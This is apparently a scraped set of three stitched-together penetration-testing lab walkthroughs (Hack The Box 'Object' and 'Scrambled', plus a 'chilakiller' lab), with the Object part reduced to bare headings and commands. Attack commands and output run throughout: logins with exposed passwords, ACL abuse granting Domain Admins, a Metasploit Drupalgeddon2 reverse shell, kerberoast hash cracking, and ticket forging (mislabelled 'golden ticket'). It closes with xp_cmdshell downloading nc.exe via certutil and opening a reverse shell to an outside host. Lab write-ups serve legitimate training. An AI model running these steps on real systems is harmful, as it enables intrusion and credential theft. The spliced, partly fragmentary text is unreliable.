htb-object-nl

Object

NMAP

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

PORT 8080 (HTTP)

cmd.exe /c powershell.exe -c Get-NetFirewallRule -Action Block -Enabled True -Direction Outbound

Foothold

┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434


Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck


Directory: C:\Users\oliver\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck


*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe

Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls


Directory: C:\Users\oliver\Documents\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe


*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip

Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>

.

Privilege Escalation (Smith)

Privilege Escalation (Maria)

Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
copy C:\Users\maria\Desktop\Engines.xls C:\ProgramData\
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights Al
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

References

ptd-chilakiller

.

.

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap 
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest: 
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
\x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]

.

 

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run

[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200

ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >

cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!– FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 –>
</body>

</html>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$

www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MariaDB [(none)]>

MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
2 rows in set (0.00 sec)

MariaDB [drupaldb]>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1

user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$

user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$

su root
pw = ChilaKill3s_Tru3_L0v3R

root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762

root@chilakiller:/var/www/html/restaurante# find / -name “FLAG1.txt”
find / -name “FLAG1.txt”
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#

root@chilakiller:/var/www/html/restaurante# hostnamectl
hostnamectl
Static hostname: chilakiller
Icon name: computer-vm
Chassis: vm
Machine ID: c8677bebac964d43bed5ebe1af1caaa6
Boot ID: 907f69a447f04a8782bde75417cec04a
Virtualization: vmware
Operating System: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-13-amd64
Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#

Author : Puckiestyle

 

htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports, this is seemingly a target on AD, with ldap and kerberos enabled. We need to do enum at several interesting places.

Found several domain names that might be useful later.

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

http://scrm.local/supportrequest.html, there is also a username found in the screenshot, ksimpson.

http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum didn’t find anything useful

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Further page enum didn’t find anything intersting

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain enum didn’t find anything useful

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So, this target may not have much to do with web vectors.

Host Enum

Perform host enum, didn’t find anything useful

> enum4linux 10.10.11.168

Port 4411 Enum

Use nc to connect to the non-conventional port 4411, there seems to be a server application running here. But we cannot confirm what application it is.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform ldap enum using a simple python module

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

nmap scan using ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

And, we know there might be a user called ksimpson from the previous screenshot. We can confirm this. This user also happens to use a password that is same as the username.

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT, to do so, use getTGT.py. Note: you may encounter an error when running the getTGT.py script, fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request
Some Googling shows that the author of this box has raised an issue on the Impacket GitHub for this very error with the title “GetUserSpns.py fails when using -k option and NTLM auth is disabled”. The suggested fix in that issue is to edit one line, which I’ll do on line 260:

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps a challenge/response (or “hash”, but not really a hash) for the MSSQLSvc user:

 

.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424




$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$09051c16c6b00ac737cc62f4fa5dec17$62e8f9961f859c011f2ac89523144de7ffafe7aacdc92bb3cd9edd3e08636753ee4b12022abc683f0fb82a53e08b2b5c09cf7704c12d16a4ded4ab34d864a52211afcf51e20a1412832a802d363dab28cb49b116bfb36d5d3de805d40e0c3915931e2127874319274e7c06dd1d1a8281304cb22d535b065537706a79729055ae3c17691c7530ea5eb76a5a78e9bb787c194d3a220c3b9fd60f59fe2c4dbc96886c3983e3c5976048b549026b70a0e42626e29dcb74a2d87d4cfa5cd225ee1c8a081faae651685194d0e2710a2637ddf58cf127e42d296c71cea104d711d43c56233879fe48c0cbb3ff6ad26e9202f9a9e69031df85f1eeaf94e6ece90e2cdd832e17c4758d93af0c83871b8dfa46a241c72e8fb192d4512e0d34774ae59b8ec18eb8886e73927caeeeec01946a03439fd63c664946106ae60cb69c6fea7d2bc373e72abf4127be697cb249ff9d4121c0650d8a213bc7a32f436619906bd69d3906c52e8e1099612d3df5026ef4fc317beb1a775e39ade9d46702ab3a597224c2fead04989b86254bcc0e69d17e688ef167b87ee3c1b09d6ea573e68fa165652051fa7d4408fda21d68230226057a593af2df26fb378896cdccf227791f5794739da0bb450e0ff8a66e2beca63250ce63492d0d191e873a9e2b4ce4186a4462b587509c815f79939824c2a21dbe4f2eb28537b92f14d11fb6ed37d028ec5eacd813af4e7db7b97af228635731279be37dcae7e604300657700506bada5b843adc67ac3242afb384865d95ba6d801057d2dfdd14bea1ae71bbe69784287c7edeb5b746451b8c24c6e8594210b2e346fec69eb56c03c00a8d4b44c1ac7d17dca267eaf72b8467f01b7ff5643772ccf74b4e64d9b4f70f3130fd12848c893733ef4aff760668ae14ffbb26ddc19603ae34c5ebb151b78826d09d882761c037e12d552ec90d28c5e7b361e179443bca4f111dc399cc53d72a87474467385e7aec504ece93157372bbc43fd54e2367c7056906f0540ea6b5680c7bbee53888e9b089cca2ee45b20f90b831a22fd0565153b0ef56e691d3c67b16ac64f5fb9a0ee0f96a0dbad8b5f57878fcf20bce7f87fb5829138d75db659c49617aad29f8ff17ee40dcd2f54635b353600b2af05f7be5629fd5109e60db01d4d86b622fb3ab2d4578eba30943b3cf388624a0be7e3dca6f3db66da2c902df2ae1c8a546a3bfbf644cc1218f2277a4114765a95658ae0e993de375aa87a88fa70c6c102561cf79c4f44d2f10f7e171a0cc91dcf8b58c97a739c32fcc82d8d15211b2e6c5efedd1be0e6a74bdd665bb5597dab63d559b1f7dccc45a50776824b477b27249a24bc7a7f59e18b9062fd316b99504c9694d284c86d1e7e580f52eef3924d2aab030e239e8386c1d3e48560c70a5415e11755dad320d099de3296e04baa65c6c

┌──(puck㉿kali)-[~/htb/scrambled]

Save the ticket to a file mssqlsvc-hash and crack using john

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

john –format=krb5tgs –wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash

 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?) 
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(puck㉿kali)-[~/htb/scrambled]

We now have a service principal credential, sqlsvc:Pegasus60

Foothold

Via golden ticket impersonation, we can gain foothold as the service principal, for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To do so, we need the ntlm hash of a valid account password and the domain SID

Get Domain SID using

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-getPac -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep “Domain SID”

 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

.

Generate the ntlm hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator, this gives b999a16500b87d17ec7f2e2a68778f05

Impersonate as Administrator, the uid is 500 by convention, read about how MS manage uid for more background.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]

Connect to mssql via the impersonated ticket

──(puck㉿kali)-[~/htb/scrambled]
└─$

export KRB5CCNAME=Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]
└─$

klist

 
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL

Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55

┌──(puck㉿kali)-[~/htb/scrambled]
┌──(puck㉿kali)-[~/htb/scrambled]
└─$

impacket-mssqlclient dc1.scrm.local -k

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>

select name, database_id from sys.databases;

name database_id 
---------- ----------- 
master 1

tempdb 2

model 3

msdb 4

ScrambleHR 5

SQL (SCRM\administrator dbo@master)>

SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;

TABLE_NAME 
---------- 
Employees

UserImport

Timesheets

SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups 
-------- ----------------- ---------- --------------- ------------- 
MiscSvc ScrambledEggs9900 scrm.local 90 0

SQL (SCRM\administrator dbo@master)>

Enable cmdshell

> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell, need to locate a folder where the current account can write to

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

